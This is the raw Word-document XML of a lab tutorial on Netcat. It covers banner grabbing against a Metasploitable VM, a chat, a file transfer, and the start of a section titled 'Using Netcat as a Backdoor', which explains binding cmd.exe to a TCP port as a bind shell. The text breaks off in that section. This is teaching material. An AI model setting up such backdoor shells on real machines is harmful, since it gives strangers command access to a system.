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C1" w:rsidRDefault="000214C1" w:rsidP="007205D6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36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007205D6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F92"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Netcat the Almighty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007205D6" w:rsidRPr="007205D6" w:rsidRDefault="007205D6" w:rsidP="007205D6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36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRPr="007205D6" w:rsidRDefault="000214C1" w:rsidP="00021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205D6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRDefault="000214C1" w:rsidP="00021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Netcat is a wonderfully versatile tool which has been dubbed the “hackers' Swiss army knife”. The simplest definition of Netcat is - "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a tool that can read and write to TCP and UDP ports"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This dual  functionality suggests that Netcat runs in two modes: “client” and “server”. If this sounds completely alien to you, please do some background research on this tool as we will be using it very often.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRPr="007205D6" w:rsidRDefault="000214C1" w:rsidP="000214C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 w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007205D6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Connecting to a TCP/UDP port with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRDefault="000214C1" w:rsidP="00021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Connecting to a TCP/UDP port can be useful in several situations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRPr="000214C1" w:rsidRDefault="000214C1" w:rsidP="00021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214C1">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="000214C1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We want to check if a port is open or closed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRPr="000214C1" w:rsidRDefault="000214C1" w:rsidP="00021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214C1">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="000214C1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We want to read a banner from the port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRPr="000214C1" w:rsidRDefault="000214C1" w:rsidP="00021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214C1">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="000214C1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We want to connect to a network service manually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000214C1" w:rsidRDefault="000214C1" w:rsidP="000214C1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A6BF3" w:rsidRDefault="000214C1" w:rsidP="000214C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Please take time to inspect Netcat's command line options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0BA9" w:rsidRDefault="000214C1" w:rsidP="000214C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5505450" cy="395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A9" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0BA9"/>
    <w:p w:rsidR="000214C1" w:rsidRPr="00B57B2B" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0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7B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In order to connect to TCP port 21 on 192.168.248.132 and read from it, try the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0BA9" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0BA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Open Metasploitable </w:t>
      </w:r>
      <w:r w:rsidR="007205D6">
        <w:t xml:space="preserve">as guest </w:t>
      </w:r>
      <w:r>
        <w:t>in VMware. It has a built in FTP server installed.</w:t>
      </w:r>
      <w:r w:rsidR="007205D6">
        <w:t xml:space="preserve"> Type the following  from the host:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0BA9" w:rsidRPr="007205D6" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0BA9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205D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\netcat&gt;nc -vn 192.168.248.132 21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0BA9" w:rsidRPr="007205D6" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0BA9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205D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(UNKNOWN) [192.168.248.132] 21 (?) open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0BA9" w:rsidRPr="007205D6" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0BA9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205D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>220 (vsFTPd 2.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB0BA9" w:rsidRDefault="00CB0BA9" w:rsidP="00CB0BA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007205D6" w:rsidRDefault="007205D6" w:rsidP="00CB0BA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3284220" cy="5943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D6" w:rsidRDefault="001A20AD" w:rsidP="007205D6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1035"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="LucidaConsole" w:hAnsi="LucidaConsole" w:cs="LucidaConsole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We see that port 21 is open and advertises the FTP banner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="LucidaConsole" w:hAnsi="LucidaConsole" w:cs="LucidaConsole"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>220-FTPd FTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57B2B" w:rsidRDefault="00B57B2B" w:rsidP="007205D6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1035"/>
        </w:tabs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Now Exit the netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57B2B" w:rsidRPr="005F737D" w:rsidRDefault="00B57B2B" w:rsidP="00B57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57B2B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In order to connect to port 80 on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7205D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.248.132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B57B2B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> send an HTTP HEAD request and read the HTTP  server banner, try the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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C:\netcat&gt;nc -vn 192.168.248.132 80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(UNKNOWN) [192.168.248.132] 80 (?) open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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HEAD / HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F737D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-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HTTP/1.1 200 OK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Date: Fri, 26 Jul 2013 19:35:35 GMT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Server: Apache/2.2.8 (Ubuntu) DAV/2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X-Powered-By: PHP/5.2.4-2ubuntu5.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F737D" w:rsidRP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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F737D" w:rsidRDefault="005F737D" w:rsidP="005F737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F737D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Content-Type: text/html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F737D" w:rsidRDefault="005F737D" w:rsidP="005F737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F737D" w:rsidRDefault="005F737D" w:rsidP="005F737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228975" cy="1219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37D" w:rsidRDefault="005F737D" w:rsidP="005F737D"/>
    <w:p w:rsidR="009E5E42" w:rsidRDefault="009E5E42" w:rsidP="009E5E4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 w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5E42">
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Listening on a TCP/UDP port with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E5E42" w:rsidRPr="009E5E42" w:rsidRDefault="009E5E42" w:rsidP="009E5E4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 w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E5E42" w:rsidRDefault="009E5E42" w:rsidP="009E5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Listening on a TCP/UDP port using Netcat is useful for network debugging client applications, or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E5E42" w:rsidRDefault="009E5E42" w:rsidP="009E5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otherwise receiving a TCP/UDP network connection. Let's try implementing a simple chat using</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E5E42" w:rsidRDefault="009E5E42" w:rsidP="009E5E4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Netcat. Please take note of your local IP address (mine Kali Linux is installed in VM ware. I am considering  Kali Linux  as my local Machine : IP is </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5E42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.248.131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292E99" w:rsidRDefault="00292E99" w:rsidP="009E5E42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292E99" w:rsidRDefault="00292E99" w:rsidP="00292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1. In order to listen on port 4444 and accept incoming connections, type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292E99" w:rsidRDefault="00292E99" w:rsidP="00292E99">
      <w:pPr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Computer 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(local computer </w:t>
      </w:r>
      <w:r w:rsidR="004F7F0D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">– Kali Linux as guest OS within VM ware. IP- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E5E42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.248.131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292E99" w:rsidRDefault="00292E99" w:rsidP="00292E99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2524125" cy="514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99" w:rsidRDefault="00292E99" w:rsidP="00292E99"/>
    <w:p w:rsidR="00292E99" w:rsidRDefault="00292E99" w:rsidP="00292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From a different computer (I will be using a lab Windows machine </w:t>
      </w:r>
      <w:r w:rsidR="008E174A"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>host PC), connect to port 4444 on your local machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292E99" w:rsidRDefault="00292E99" w:rsidP="00292E99">
      <w:pPr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Computer 2 </w:t>
      </w:r>
      <w:r w:rsidR="008E174A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Windows box - 192.168.248.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D00EE2" w:rsidRDefault="008E174A" w:rsidP="00292E99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5562600" cy="6286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4A" w:rsidRDefault="00D00EE2" w:rsidP="00D00EE2">
      <w:r>
        <w:t>You will see the  line appearing in local PC  i.e. Computer 1  as follows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B743C" w:rsidRDefault="00D00EE2" w:rsidP="00D00EE2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5631180" cy="116586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E2" w:rsidRDefault="00D00EE2" w:rsidP="001B743C"/>
    <w:p w:rsidR="001B743C" w:rsidRDefault="00BD297C" w:rsidP="001B743C">
      <w:r>
        <w:t>Now type something in computer1,  you will get</w:t>
      </w:r>
      <w:r w:rsidR="00B0644B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B0644B">
        <w:t xml:space="preserve"> same </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output in Computer2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD297C" w:rsidRDefault="00BD297C" w:rsidP="001B743C"/>
    <w:p w:rsidR="00BD297C" w:rsidRDefault="00BD297C" w:rsidP="001B743C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5303520" cy="2628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E8" w:rsidRDefault="003423E8" w:rsidP="001B743C"/>
    <w:p w:rsidR="003423E8" w:rsidRDefault="003423E8" w:rsidP="001B743C"/>
    <w:p w:rsidR="003423E8" w:rsidRDefault="003423E8" w:rsidP="001B743C"/>
    <w:p w:rsidR="003423E8" w:rsidRPr="003423E8" w:rsidRDefault="003423E8" w:rsidP="001B7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42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Transferring files with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003423E8" w:rsidRDefault="00452F37" w:rsidP="00452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Netcat can also be used to transfer files from one computer to another. This applies to text and binary  files. In order to send a file from Computer 2 to Computer 1, try the following:</w:t>
      </w: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Computer 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: We'll set up Netcat to listen to and accept the connection and to redirect any input into a  file.</w:t>
      </w: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3390900" cy="485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</w:pP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Computer 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: We'll connect to the listening Netcat on computer 1 (port 4444) and send the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452F37" w:rsidRDefault="00452F37" w:rsidP="00452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79F8" w:rsidRDefault="003579F8" w:rsidP="00452F3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400675" cy="122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9F8" w:rsidRDefault="003579F8" w:rsidP="003579F8"/>
    <w:p w:rsidR="00452F37" w:rsidRDefault="003579F8" w:rsidP="003579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 Netcat doesn't give any indication of file transfer progress, we just wait for a few seconds and  then press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Ctrl+c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to exit Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003579F8" w:rsidRDefault="003579F8" w:rsidP="003579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79F8" w:rsidRDefault="003579F8" w:rsidP="003579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Computer 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>you should see:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003579F8" w:rsidRDefault="003579F8" w:rsidP="003579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4F47" w:rsidRDefault="003579F8" w:rsidP="003579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847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47" w:rsidRDefault="00134F47" w:rsidP="00134F47"/>
    <w:p w:rsidR="003579F8" w:rsidRDefault="00134F47" w:rsidP="00134F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check that the file was transferred correctly:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F47" w:rsidRDefault="00134F47" w:rsidP="00134F47">
      <w:pPr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Computer 1: type :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134F47" w:rsidRDefault="00134F47" w:rsidP="00134F47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4533900" cy="8286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63" w:rsidRDefault="00812863" w:rsidP="00134F47"/>
    <w:p w:rsidR="00812863" w:rsidRPr="004E2FE0" w:rsidRDefault="004E2FE0" w:rsidP="00134F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2FE0">
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remote Administration with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E2FE0" w:rsidRDefault="004E2FE0" w:rsidP="00134F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other name of this  topic  is “Using Netcat as a Backdoor.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E2FE0" w:rsidRDefault="004166F1" w:rsidP="00416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 of Netcat's neat features is command  redirection. This means that Netcat can take an executable file and redirect the input, output and  error messages to a TCP/UDP port, rather than the default console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004166F1" w:rsidRDefault="000344FD" w:rsidP="000344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Take for example the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cmd.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>executable. By redirecting the stdin/stdout/stderr to the network, we  can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command  prompt belonging to this computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000344FD" w:rsidRDefault="000344FD" w:rsidP="000344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F26C9" w:rsidRDefault="003F26C9" w:rsidP="003F2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Let's start this example with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Bob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Alice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– two fictional characters trying to connect to each other's  computers. Please take note of the network configurations – they play a critical role, as we will soon  see.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C6AAD" w:rsidRDefault="009C6AAD" w:rsidP="003F2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AAD" w:rsidRDefault="009C6AAD" w:rsidP="003F26C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362575" cy="2714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AD" w:rsidRDefault="009C6AAD" w:rsidP="003F26C9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C6AAD" w:rsidRDefault="009C6AAD" w:rsidP="003F26C9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C6AAD" w:rsidRPr="0080542E" w:rsidRDefault="0080542E" w:rsidP="003F26C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 w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080542E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria,Bold" w:hAnsi="Cambria,Bold" w:cs="Cambria,Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario 1 – Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080542E" w:rsidRDefault="0080542E" w:rsidP="003F26C9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0080542E" w:rsidRDefault="0080542E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scenario 1, Bob has requested Alice's assistance and has asked her to connect to his computer and help him out by issuing some commands remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080542E" w:rsidRDefault="0080542E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Bob  is directly connected to the internet. Alice, however, is behind a NAT'ed connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080542E" w:rsidRDefault="0080542E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order to complete the scenario, Bob needs to bind cmd.exe to a TCP port on his machine and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080542E" w:rsidRDefault="0080542E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inform Alice which port to connect to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0080542E" w:rsidRDefault="0080542E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0542E" w:rsidRDefault="00D637FA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Bob : Computer2</w:t>
      </w:r>
      <w:r w:rsidR="00B236CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows PC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D637FA" w:rsidRDefault="00D637FA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Alice : Computer1</w:t>
      </w:r>
      <w:r w:rsidR="00B236CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D637FA" w:rsidRDefault="00D637FA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637FA" w:rsidRPr="00D637FA" w:rsidRDefault="00D637FA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637FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bob’s PC:-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D637FA" w:rsidRDefault="00D637FA" w:rsidP="008054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637FA" w:rsidRDefault="00D637FA" w:rsidP="0080542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781300" cy="447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7FA" w:rsidRDefault="00D637FA" w:rsidP="0080542E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D637FA" w:rsidRDefault="00D637FA" w:rsidP="00D637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Anyone connecting to port 4444 on Bob's machine (hopefully Alice) will be presented with Bob's  command prompt, with the same permissions that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nc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>was run with.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D637FA" w:rsidRDefault="00D637FA" w:rsidP="00D637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6D85" w:rsidRDefault="00566D85" w:rsidP="00D637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  <w:r w:rsidRPr="00566D85">
        <w:rPr>
